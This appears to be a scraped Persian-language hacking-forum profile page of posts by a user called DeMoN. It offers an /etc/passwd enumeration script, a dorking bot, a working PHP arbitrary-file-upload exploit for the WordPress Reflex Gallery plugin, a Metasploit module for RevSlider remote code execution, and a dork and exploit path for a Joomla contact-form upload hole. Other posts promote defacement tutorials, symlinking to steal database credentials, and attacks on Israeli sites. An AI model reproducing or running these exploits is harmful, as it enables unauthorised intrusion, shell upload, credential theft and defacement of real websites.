lang="ar-sa"><font size=2> EHC TeaM By Br0keN <br><br> <p align="center" dir="rtl"><font color="#D50428"><span lang="ar-sa"><font size=2>Web:vb.ehcommunity.com<br><br><br> etc/passwd/</b></font><br> <?php error_reporting(E_ALL ^ E_NOTICE); if (function_exists('posix_getpwuid')) { if (isset($_POST['Br']) && isset($_POST['x0'])) { $Br = intval($_POST['Br']); $x0 = intval($_POST['x0']); while ($Br < $x0) { $uid = posix_getpwuid($Br); if ($uid) { $uid["dir"] = "<a href=\"\">".$uid["dir"]."</a>"; echo join(":",$uid)."<br>"; } $Br++; } } else { echo ' <form method="POST" action="?br0=x0">Uid FROM : <input type="text" name="Br" value="1" size="4"> TO : <input type="text" name="x0" value="1000" size="4"> <input type="submit" name="Show" value="Show">'; } } else die("Error..! Posix Functions are disabled..!!!"); die(); ?>
  14. DeMoN

    <?php // HotBot project for Dorking // Coded in Morocco 27/11/2014 at 19:18 in my room xD // Greetz to all codersleet members and my friends // dont change the rights // http://pastebin.com/u/magnom //http://magsec.blogspot.com/2015/06/hotbot-auto-dorker.html print " +-----------------------------+ | HotBot Dorking | | coded by Mr.MaGnoM | | CodersLeet Team | +-----------------------------+ "; echo "\n"; $ch1 =curl_init("http://www.hotbot.com/"); curl_setopt($ch1, CURLOPT_RETURNTRANSFER, 1); $keyvoll = curl_exec($ch1); curl_close($ch1); $ma=preg_match("/\.val\('(.*?)'\);/",$keyvoll,$ke); //echo $ke[1]."\n"; //$dork=urlencode($argv[1]); // http://www.hotbot.com/search/web?pn=$i&q=$dork&keyvol=$ke[1] $ch=curl_init(); for($i=1;$i<=30;$i++){ curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch,CURLOPT_URL,"http://www.hotbot.com/search/web?pn=$i&q=*ur dork here*&keyvol=$ke[1]"); // here ur dork encoded use this site for encode ur dork http://urldecode.org/ curl_setopt($ch,CURLOPT_COOKIEFILE,'cookie.txt'); curl_setopt($ch,CURLOPT_COOKIEJAR,'cookie.txt'); curl_setopt($ch,CURLOPT_USERAGENT,'msnbot/1.0 (+http://search.msn.com/msnbot.htm)'); curl_setopt($ch,CURLOPT_ENCODING,"gzip, deflate, compress"); $data=curl_exec($ch); preg_match_all('#<span class="web-baseuri">(.*?)</span>#',$data,$matches); $links=array_unique($matches[1]); //print_r($matches[1]); $op=@fopen('result.html','a+'); foreach ($links as $ul){ echo "http://".$ul."/"."\n"; fwrite($op,"http://$ul/<br>"); } fclose($op); //if(!preg_match('#NO RESULTS FOUND#i',$data)) break; } ?>
  15. سلام خدمت دوستان عزیز گارد ایران. در این تاپیک میخوام یک باگ پرایوت رو پابلیک کنم. در این ویدیو شما یاد خواهید گرفت که چگونه صفحه دیفیس خودتون رو در سایت جوملا آپ کنید و در زون به ثبت برسونیدش. سایت های هک شده pass:guardiran.org برای استفاده از آموزش ابتدا همه ی پارتهارو دانلود کرده سپس در یک پوشه اکسترکت نمایید. یا حق Bandicam.part1.rar Bandicam.part2.rar Bandicam.part3.rar Bandicam.part4.rar Bandicam.part5.rar
  16. DeMoN

    سلام خدمت عزیزان گارد ایران.خوب دوستان,من در این تاپییک قصد دارم که به همراه شما باگهای سایت های اسراییلی رو بررسی کنم. امیدوارم از آموزش ها نهایت و بهره و ببرین. به امید روزی که صهیونیست و استکبار و ظالم از صفحه روزگار محو شوند. یا حق
  17. سلام خدمت دوستان عزیز گارد ایران. خوب دوستان,براتون آموزشی مفید رو آماده کردم که امیدوارم به دردتون بخوره.آموزش کامل مس دیفیس. pass:guardiran.org برای استفاده از آموزش ها ابتدا تمامی پارت ها را دانلود کرده و در یک پوشه اکسترکت نمایید. لینک ابزار پوتی پیشنهاد میکنم دوستانی که اطلاعاتی در این زمینه ندارن ابتدا لینک زیر رو مشاهده کند. لینک آموزش سیملینک زدن برای خواندن فایلهای کنفیگ رو هم قرار دادم. سیملینک یا حق manual mass deface.part1.rar manual mass deface.part2.rar manual mass deface.part3.rar
  18. سلام خدمت دوستان عزیز گارد ایران. خوب در این درس تصویری شما رو با نحوه ی سیملینک زدن آشنا میکنم. شاید از خودتون بپرسین سیملینک چیست؟ خوب در جواب باید بگم که سیملینک برای خواندن فایلهای کانفیگ و استخراج یوزر و پسورد و نام دیتابیس استفاده میشه که با این یوزر و پس میتونین به دیتا بیس وصل بشین. به دوستان تازه وارد پیشنهاد میکنم که یک نگاهی به لینک زیر بندازید تا با این متد آشنایی بیشتری پیدا کنید. http://guardiran.org/forums/index.php?/topic/156-سیملینک-symlink-چیست-؟-سیملینک-سرور-هکینگ/ Pass:guardiran.org یا حق symlink.part01.rar symlink.part02.rar
  19. DeMoN

    سلام خدمت دوستان عزیز گارد ایران. براتون کتابی آماده کردم در حوضه باگ امنیتی SQL Injection که در این کتاب شما با تمامی مفاهیم،دستورات و نکات باگ SQL آشنا خواهید شد. پیشنهاد میکنم که حتما اینکتاب رو دانلود و مطالعه کنند خصوصا عزیزان تازه وارد. Pass:guardiran.org یاحق SQLInjection.rar
  20. DeMoN

    <?php /* # Exploit Title: Wordpress Plugin Reflex Gallery - Arbitrary File Upload # TIPE: Arbitrary File Upload # Google DORK: inurl:"wp-content/plugins/reflex-gallery/" # Vendor: https://wordpress.org/plugins/reflex-gallery/ # Tested on: Linux # Version: 3.1.3 (Last) # EXECUTE: php exploit.php www.alvo.com.br shell.php # OUTPUT: Exploit_AFU.txt # POC http://i.imgur.com/mpjXaZ9.png # REF COD http://1337day.com/exploit/23369 -------------------------------------------------------------------------------- <form method = "POST" action = "" enctype = "multipart/form-data" > <input type = "file" name = "qqfile"><br> <input type = "submit" name = "Submit" value = "Pwn!"> </form > -------------------------------------------------------------------------------- # AUTOR: Cleiton Pinheiro / Nick: googleINURL # Blog: http://blog.inurl.com.br # Twitter: https://twitter.com/googleinurl # Fanpage: https://fb.com/InurlBrasil # Pastebin http://pastebin.com/u/Googleinurl # GIT: https://github.com/googleinurl # PSS: http://packetstormsecurity.com/user/googleinurl/ # YOUTUBE https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA */ error_reporting(1); set_time_limit(0); ini_set('display_errors', 1); ini_set('max_execution_time', 0); ini_set('allow_url_fopen', 1); ob_implicit_flush(true); ob_end_flush(); function __plus() { ob_flush(); flush(); } function __request($params) { $objcurl = curl_init(); curl_setopt($objcurl, CURLOPT_URL, "{$params['host']}/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php?Year=2015&Month=03"); curl_setopt($objcurl, CURLOPT_POST, 1); curl_setopt($objcurl, CURLOPT_HEADER, 1); curl_setopt($objcurl, CURLOPT_REFERER, $params['host']); curl_setopt($objcurl, CURLOPT_POSTFIELDS, array('qqfile' => "@{$params['file']}")); curl_setopt($objcurl, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($objcurl, CURLOPT_CONNECTTIMEOUT, 10); curl_setopt($objcurl, CURLOPT_RETURNTRANSFER, 1); $info['corpo'] = curl_exec($objcurl) . __plus(); $info['server'] = curl_getinfo($objcurl) . __plus(); curl_close($objcurl) . __plus(); return $info; } echo "[+] Wordpress Plugin Reflex Gallery - Arbitrary File Upload Vulnerability\n\n"; $params = array('file' => isset($argv[2]) ? $argv[2] : exit("\n0x[ERRO] DEFINE FILE SHELL!\n"), 'host' => isset($argv[1]) ? (strstr($argv[1], 'http') ? $argv[1] : "http://{$argv[1]}") : exit("\n0x[ERRO] DEFINE TARGET!\n")); __request($params) . __plus(); $_s = "{$params['host']}/wp-content/uploads/2015/03/{$params['file']}"; $_h = get_headers("{$params['host']}/wp-content/uploads/2015/03/{$params['file']}", 1); foreach ($_h as $key => $value) { echo date("h:m:s") . " [INFO][{$key}]:: {$value}\n"; } $_x = (strstr(($_h[0] . (isset($_h[1]) ? $_h[1] : NULL)), '200')); print "\n" . date("h:m:s") . " [INFO][COD]:: " . (!empty($_x) ? '[+] VULL' : '[-] NOT VULL'); print "\n" . date("h:m:s") . " [INFO][SHELL]:: " . (!empty($_x) ? "[+] {$_s}" . file_put_contents("Exploit_AFU.txt", "{$_s}\n\n", FILE_APPEND) : '[-] ERROR!'); WordPress Reflex Gallery 3.1.3 Shell Upload حالشو ببرین یا حق
  21. DeMoN

    ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::HTTP::Wordpress include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'Wordpress RevSlider File Upload and Execute Vulnerability', 'Description' => %q{ This module exploits an arbitrary PHP code upload in the WordPress ThemePunch Revolution Slider ( revslider ) plugin, version 3.0.95 and prior. The vulnerability allows for arbitrary file upload and remote code execution. }, 'Author' => [ 'Simo Ben youssef', # Vulnerability discovery 'Tom Sellers <tom[at]fadedcode.net>' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['URL', 'https://whatisgon.wordpress.com/2014/11/30/another-revslider-vulnerability/'], ['EDB', '35385'], ['WPVDB', '7954'], ['OSVDB', '115118'] ], 'Privileged' => false, 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [['ThemePunch Revolution Slider (revslider) 3.0.95', {}]], 'DisclosureDate' => 'Nov 26 2015', 'DefaultTarget' => 0) ) end def check release_log_url = normalize_uri(wordpress_url_plugins, 'revslider', 'release_log.txt') check_version_from_custom_file(release_log_url, /^\s*(?:version)\s*(\d{1,2}\.\d{1,2}(?:\.\d{1,2})?).*$/mi, '3.0.96') end def exploit php_pagename = rand_text_alpha(4 + rand(4)) + '.php' # Build the zip payload_zip = Rex::Zip::Archive.new # If the filename in the zip is revslider.php it will be automatically # executed but it will break the plugin and sometimes WordPress payload_zip.add_file('revslider/' + php_pagename, payload.encoded) # Build the POST body data = Rex::MIME::Message.new data.add_part('revslider_ajax_action', nil, nil, 'form-data; name="action"') data.add_part('update_plugin', nil, nil, 'form-data; name="client_action"') data.add_part(payload_zip.pack, 'application/x-zip-compressed', 'binary', "form-data; name=\"update_file\"; filename=\"revslider.zip\"") post_data = data.to_s res = send_request_cgi( 'uri' => wordpress_url_admin_ajax, 'method' => 'POST', 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => post_data ) if res if res.code == 200 && res.body =~ /Update in progress/ # The payload itself almost never deleted, try anyway register_files_for_cleanup(php_pagename) # This normally works register_files_for_cleanup('../revslider.zip') final_uri = normalize_uri(wordpress_url_plugins, 'revslider', 'temp', 'update_extract', 'revslider', php_pagename) print_good("#{peer} - Our payload is at: #{final_uri}") print_status("#{peer} - Calling payload...") send_request_cgi( 'uri' => normalize_uri(final_uri), 'timeout' => 5 ) elsif res.code == 200 && res.body =~ /^0$/ # admin-ajax.php returns 0 if the 'action' 'revslider_ajax_action' is unknown fail_with(Failure::NotVulnerable, "#{peer} - Target not vulnerable or the plugin is deactivated") else fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}") end else fail_with(Failure::Unknown, 'ERROR') end end end WordPress RevSlider 3.0.95 File Upload / Execute یا حق
  22. DeMoN

    سلام خدمت دوستان گارد ایران. همراه شما هستیم با آموز. هک سایت با " cms"sexy contact .فقط شما باید یکخورده خلاقیت به خرج بدین و دورک جدید براش بسارین،این دورکش یکخورده قدیمیه و تعداد تارگت هاش کمه. خوب بریم سراغ آموزش: ابتدا دورک زیر رو در گوگل جست و جوکنید: Powered by sexycontact\" site:gr inurl:/sexy-contact-form سپس به آخر سایت اکسپلویت زیر را اضافه کنید. components/com_sexycontactform/fileupload/index.php به صورت زیر: Www.site.com/components/com_sexycontactform/fileupload/index.php به امید روزی که هیچ سایت sexy در فضای مجازی وجود نداشته باشه. یاحق